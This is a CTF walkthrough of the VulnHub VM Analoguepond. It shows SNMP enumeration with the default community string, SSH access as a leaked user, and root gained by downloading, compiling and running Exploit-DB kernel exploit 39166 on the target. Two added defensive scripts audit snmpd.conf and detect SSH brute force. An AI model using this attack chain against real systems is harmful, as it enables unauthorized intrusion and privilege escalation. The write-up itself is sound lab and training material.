CTF Analoguepond from @knightmare2600 (VulnHub)

It has been a while since I solved a CTF. I decided to try to crack Analoguepond from @knightmare2600.

First you need to put on an appropriate soundtrack for this VM.

Nmap (TCP SYN + UDP scan, with service and OS detection):

root@kali:~# nmap -sS -sU -T4 -A -v 192.168.1.14

Starting Nmap 7.60 ( https://nmap.org ) at 2017-08-20 13:37 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating ARP Ping Scan at 13:37
Scanning 192.168.1.14 [1 port]
Completed ARP Ping Scan at 13:37, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:37
Completed Parallel DNS resolution of 1 host. at 13:37, 0.01s elapsed
Initiating SYN Stealth Scan at 13:37
Scanning 192.168.1.14 [1000 ports]
Discovered open port 22/tcp on 192.168.1.14
Completed SYN Stealth Scan at 13:37, 1.26s elapsed (1000 total ports)
Initiating UDP Scan at 13:37
Scanning 192.168.1.14 [1000 ports]
Increasing send delay for 192.168.1.14 from 0 to 50 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 192.168.1.14 from 50 to 100 due to max_successful_tryno increase to 5
Increasing send delay for 192.168.1.14 from 100 to 200 due to max_successful_tryno increase to 6
Warning: 192.168.1.14 giving up on port because retransmission cap hit (6).
UDP Scan Timing: About 15.06% done; ETC: 13:41 (0:02:55 remaining)
Increasing send delay for 192.168.1.14 from 200 to 400 due to 16 out of 39 dropped probes since last increase.
UDP Scan Timing: About 19.39% done; ETC: 13:43 (0:04:14 remaining)
Increasing send delay for 192.168.1.14 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 22.36% done; ETC: 13:44 (0:05:16 remaining)
UDP Scan Timing: About 25.53% done; ETC: 13:45 (0:05:53 remaining)
UDP Scan Timing: About 28.50% done; ETC: 13:46 (0:06:19 remaining)
UDP Scan Timing: About 36.37% done; ETC: 13:48 (0:06:46 remaining)
UDP Scan Timing: About 47.17% done; ETC: 13:49 (0:06:14 remaining)
UDP Scan Timing: About 54.54% done; ETC: 13:50 (0:05:38 remaining)
UDP Scan Timing: About 60.99% done; ETC: 13:50 (0:05:00 remaining)
UDP Scan Timing: About 66.83% done; ETC: 13:51 (0:04:21 remaining)
UDP Scan Timing: About 72.66% done; ETC: 13:51 (0:03:39 remaining)
UDP Scan Timing: About 78.09% done; ETC: 13:51 (0:02:59 remaining)
UDP Scan Timing: About 83.40% done; ETC: 13:51 (0:02:17 remaining)
UDP Scan Timing: About 88.63% done; ETC: 13:51 (0:01:35 remaining)
UDP Scan Timing: About 93.84% done; ETC: 13:51 (0:00:52 remaining)
Discovered open port 161/udp on 192.168.1.14
Completed UDP Scan at 13:52, 904.80s elapsed (1000 total ports)
Initiating Service scan at 13:52
Scanning 93 services on 192.168.1.14
Service scan Timing: About 3.23% done; ETC: 14:29 (0:35:30 remaining)
Service scan Timing: About 35.48% done; ETC: 13:58 (0:03:49 remaining)
Service scan Timing: About 36.56% done; ETC: 14:00 (0:04:34 remaining)
Service scan Timing: About 68.82% done; ETC: 13:57 (0:01:34 remaining)
Service scan Timing: About 76.34% done; ETC: 13:58 (0:01:18 remaining)
Completed Service scan at 13:57, 262.62s elapsed (93 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.14
adjust_timeouts2: packet supposedly had rtt of -175682 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -175682 microseconds. Ignoring time.
NSE: Script scanning 192.168.1.14.
Initiating NSE at 13:57
Completed NSE at 13:57, 30.80s elapsed
Initiating NSE at 13:57
Completed NSE at 13:57, 4.77s elapsed
Nmap scan report for 192.168.1.14
Host is up (0.00045s latency).
Not shown: 1907 closed ports, 91 open|filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b8:83:a1:ee:76:be:b7:3f:b9:45:ad:b4:ba:47:8b:75 (DSA)
| 2048 19:98:89:e1:d4:4c:42:2b:ca:da:37:79:99:1b:c9:ab (RSA)
| 256 81:5d:1c:e1:2b:03:7d:e3:18:c3:bc:a0:cf:0b:f7:63 (ECDSA)
|_ 256 73:0b:c9:69:8a:1d:1b:63:a3:68:ab:f5:c6:a8:c0:1c (EdDSA)
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: f391e6401236975900000000
| snmpEngineBoots: 2
|_ snmpEngineTime: 27m55s
| snmp-sysdescr: Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
|_ System uptime: 27m55.15s (167515 timeticks)
MAC Address: 08:00:27:42:5B:7B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 0.017 days (since Sun Aug 20 13:33:50 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: analoguepond; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.1.14

NSE: Script Post-scanning.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1207.09 seconds
Raw packets sent: 3054 (107.708KB) | Rcvd: 2011 (98.207KB)


SNMP is open with the default community string, so next comes SNMP enumeration following the Metasploit Unleashed guide: https://www.offensive-security.com/metasploit-unleashed/snmp-scan/


msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set rhost 192.168.1.14
[!] RHOST is not a valid option for this module. Did you mean RHOSTS?
rhost => 192.168.1.14
msf auxiliary(snmp_login) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf auxiliary(snmp_login) > set threads 10
threads => 10
msf auxiliary(snmp_login) > run

[+] 192.168.1.14:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf auxiliary(snmp_enum) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf auxiliary(snmp_enum) > run

[+] 192.168.1.14, Connected.

[*] System information:

Host IP : 192.168.1.14
Hostname : analoguepond
Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
Contact : Eric Burdon <eric@example.com>
Location : There is a house in New Orleans they call it...
Uptime snmp : 01:29:23.40
Uptime system : 01:28:54.15
System date : 2017-8-23 01:20:44.0


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

...THE RISING SUN...
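The whole foothold above rests on snmpd answering to the default "public" community from any source and publishing a sysContact and sysLocation that hand over a user name and a password hint. The following is an added example for this write-up (not code from the original post or from the VM) that audits an snmpd.conf body for exactly those weaknesses and shows the weak settings beside a hardened SNMPv3-only configuration. Both configuration texts are constructed samples; the passphrases in the hardened one are placeholders.

```python
"""Audit an snmpd.conf for the weaknesses the SNMP enumeration above relied on.

Added example for this write-up, not code from the original post or from the VM.
Both configuration texts below are constructed samples; the hardened one uses
placeholder passphrases that must be replaced before use.
"""
import re

# Community strings that ship as defaults and are the first ones any scanner
# (nmap's snmp-brute, Metasploit's snmp_login) tries.
DEFAULT_COMMUNITIES = {"public", "private", "manager", "snmp", "community"}

# Constructed sample of the weak setup: a default read-only community reachable
# from any source, a default read-write community, and a contact field that
# leaks a user name.
WEAK_CONF = """\
rocommunity public
rwcommunity private 192.168.1.0/24
sysLocation There is a house in New Orleans they call it...
sysContact Eric Burdon <eric@example.com>
"""

# Constructed sample of a hardened setup: no v1/v2c communities at all, one
# SNMPv3 user with authentication and privacy, restricted to a small view.
HARDENED_CONF = """\
createUser monitor SHA AUTH-PASSPHRASE-PLACEHOLDER AES PRIV-PASSPHRASE-PLACEHOLDER
rouser monitor priv -V systemonly
view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1
sysLocation Rack 4, row B
sysContact Network operations (ticket queue NETOPS)
"""

# rocommunity / rwcommunity (and the IPv6 variants):
#   <directive> <community> [source] [OID | -V view]
COMMUNITY_RE = re.compile(
    r"^(?P<dir>r[ow]community6?)\s+(?P<community>\S+)(?:\s+(?P<source>\S+))?",
    re.IGNORECASE,
)


def audit_snmpd_conf(text):
    """Return a list of (severity, message) findings for one snmpd.conf body."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = COMMUNITY_RE.match(line)
        if m:
            directive = m.group("dir").lower()
            community = m.group("community")
            source = m.group("source")
            # A third token starting with '-' or '.' is a view option or an OID,
            # not a source restriction.
            if source is not None and source[0] in "-.":
                source = None
            # Any community-based access means plaintext SNMPv1/v2c authentication.
            findings.append(("low", f"line {lineno}: {directive} uses SNMPv1/v2c; prefer an SNMPv3 rouser"))
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append(("high", f"line {lineno}: default community string '{community}'"))
            if directive.startswith("rw"):
                findings.append(("high", f"line {lineno}: write access granted to community '{community}'"))
            # No source, or the literal 'default', means any address may query.
            if source is None or source.lower() == "default":
                findings.append(("medium", f"line {lineno}: community '{community}' accepted from any source"))
            continue
        if line.lower().startswith("syscontact") and "@" in line:
            findings.append(("low", f"line {lineno}: sysContact exposes an e-mail address, which doubles as a user name hint"))
    return findings


def worst_severity(findings):
    """Collapse findings into the single highest severity, or 'ok' if there are none."""
    order = {"ok": 0, "low": 1, "medium": 2, "high": 3}
    return max((sev for sev, _ in findings), key=order.__getitem__, default="ok")


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        result = audit_snmpd_conf(conf)
        print(f"{name}: {worst_severity(result)}")
        for sev, msg in result:
            print(f"  [{sev}] {msg}")
```

Run against the weak sample it reports the default communities, the write-capable community and the unrestricted source as the top findings; the hardened sample produces no findings because access is only possible through an authenticated and encrypted SNMPv3 user, limited to the system and host-resources subtrees.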

Playing in the background: https://www.youtube.com/watch?v=5A-4VGfx5lU

root@kali:~# ssh root@192.168.1.14

Warning: Permanently added '192.168.1.14' (ECDSA) to the list of known hosts.
root@192.168.1.14's password:
Permission denied, please try again.
root@192.168.1.14's password:
Permission denied, please try again.
root@192.168.1.14's password:
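The failed root logins above, followed minutes later by a successful password login for eric from the same address, are the textbook footprint of password guessing in sshd's auth.log. The following is an added example for this write-up (not code from the original post) that runs that detection over constructed sample log lines in the Ubuntu 14.04 sshd format; the lines, host name, PIDs and addresses are made up for the example, not taken from the VM.

```python
"""Flag SSH password guessing in auth.log, the footprint left by the login attempts above.

Added example for this write-up, not code from the original post. The log lines
below are constructed samples in the Ubuntu 14.04 sshd format, not logs from the VM.
"""
import re
from collections import defaultdict

# Constructed sample: three failed root logins, then a successful password login
# for another user from the same source, plus an unrelated single failure.
SAMPLE_AUTH_LOG = """\
Aug 22 19:50:01 analoguepond sshd[1432]: Failed password for root from 192.168.1.122 port 51002 ssh2
Aug 22 19:50:04 analoguepond sshd[1432]: Failed password for root from 192.168.1.122 port 51002 ssh2
Aug 22 19:50:07 analoguepond sshd[1432]: Failed password for root from 192.168.1.122 port 51002 ssh2
Aug 22 19:50:09 analoguepond sshd[1432]: Connection closed by 192.168.1.122 [preauth]
Aug 22 19:51:40 analoguepond sshd[1440]: Accepted password for eric from 192.168.1.122 port 51010 ssh2
Aug 22 19:51:44 analoguepond sshd[1440]: pam_unix(sshd:session): session opened for user eric by (uid=0)
Aug 22 20:03:12 analoguepond sshd[1501]: Failed password for invalid user admin from 10.0.0.9 port 40022 ssh2
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port"
)


def analyse_auth_log(text, threshold=3):
    """Return (failures, alerts).

    failures: {source_ip: {user: failed_count}}
    alerts:   list of tuples, one per alert:
              ("brute_force", ip, user, count)            when a user hits the threshold
              ("success_after_failures", ip, user, count) when a login succeeds from a
                                                          source that failed earlier
    """
    failures = defaultdict(lambda: defaultdict(int))
    alerts = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            ip, user = m.group("ip"), m.group("user")
            failures[ip][user] += 1
            # Fire exactly once, the moment the threshold is reached.
            if failures[ip][user] == threshold:
                alerts.append(("brute_force", ip, user, threshold))
            continue
        m = ACCEPTED_RE.search(line)
        if m and m.group("ip") in failures:
            # Success from a source with prior failures: the attacker likely
            # found a working password after guessing.
            total = sum(failures[m.group("ip")].values())
            alerts.append(("success_after_failures", m.group("ip"), m.group("user"), total))
    return {ip: dict(users) for ip, users in failures.items()}, alerts


def root_password_attempts(failures):
    """Count failed password logins for root across all sources.

    Any non-zero value means sshd still accepts password authentication for
    root; PermitRootLogin no (or prohibit-password) closes that door.
    """
    return sum(users.get("root", 0) for users in failures.values())


if __name__ == "__main__":
    failed, found = analyse_auth_log(SAMPLE_AUTH_LOG)
    for alert in found:
        print(alert)
    print("failed root password logins:", root_password_attempts(failed))
```

The threshold alert alone is noisy on any internet-facing host; the second signal, a success from a source that was failing moments earlier, is the one worth paging on, and the root-attempt counter is a quick check that password logins for root are still being offered at all.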

root@kali:~# ssh eric@192.168.1.14
eric@192.168.1.14's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Tue Aug 22 19:51:44 BST 2017

System load: 1.0 Memory usage: 2% Processes: 83
Usage of /: 82.3% of 5.39GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/
eric@analoguepond:~$ ls
reticulatingsplines.gif
eric@analoguepond:~$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.1.122 - - [23/Aug/2017 01:33:36] "GET /reticulatingsplines.gif HTTP/1.1" 200 -

Cow joke lol

Privilege escalation: the kernel is an unpatched 3.19.0-25 on Ubuntu 14.04, so a local kernel exploit from Exploit-DB, compiled on the target with the gcc that is already installed, gives root: https://www.exploit-db.com/exploits/39166/

eric@analoguepond:~$ wget https://www.exploit-db.com/download/39166
--2017-08-23 01:54:15-- https://www.exploit-db.com/download/39166
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2789 (2.7K) [application/txt]
Saving to: ‘39166’

100%[======================================>] 2,789 --.-K/s in 0s

2017-08-23 01:54:15 (470 MB/s) - ‘39166’ saved [2789/2789]

eric@analoguepond:~$ ls
39166 reticulatingsplines.gif
eric@analoguepond:~$ mv ./39166 ./39166.c
eric@analoguepond:~$ ls
39166.c reticulatingsplines.gif
eric@analoguepond:~$ gcc ./39166.c
eric@analoguepond:~$ ls
39166.c a.out reticulatingsplines.gif
eric@analoguepond:~$ ./a.out
root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)


root@analoguepond:/root# cat /root/flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

root@analoguepond:/root# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:42:5b:7b
inet addr:192.168.1.14 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe42:5b7b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3213 errors:0 dropped:0 overruns:0 frame:0
TX packets:1469 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:273953 (273.9 KB) TX bytes:185237 (185.2 KB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:748 (748.0 B) TX bytes:748 (748.0 B)

virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:166 errors:0 dropped:0 overruns:0 frame:0
TX packets:149 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11122 (11.1 KB) TX bytes:17147 (17.1 KB)

root@analoguepond:/root# nmap -sn 192.168.122.0/24

Starting Nmap 6.40 ( http://nmap.org ) at 2017-08-23 02:15 BST
Nmap scan report for puppet.example.com (192.168.122.2)
Host is up (0.00081s latency).
MAC Address: 52:54:00:5B:05:F7 (QEMU Virtual NIC)
Nmap scan report for barringsbank.example.com (192.168.122.3)
Host is up (0.00066s latency).
MAC Address: 52:54:00:6D:93:6A (QEMU Virtual NIC)
Nmap scan report for 192.168.122.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.12 seconds

To be continued…
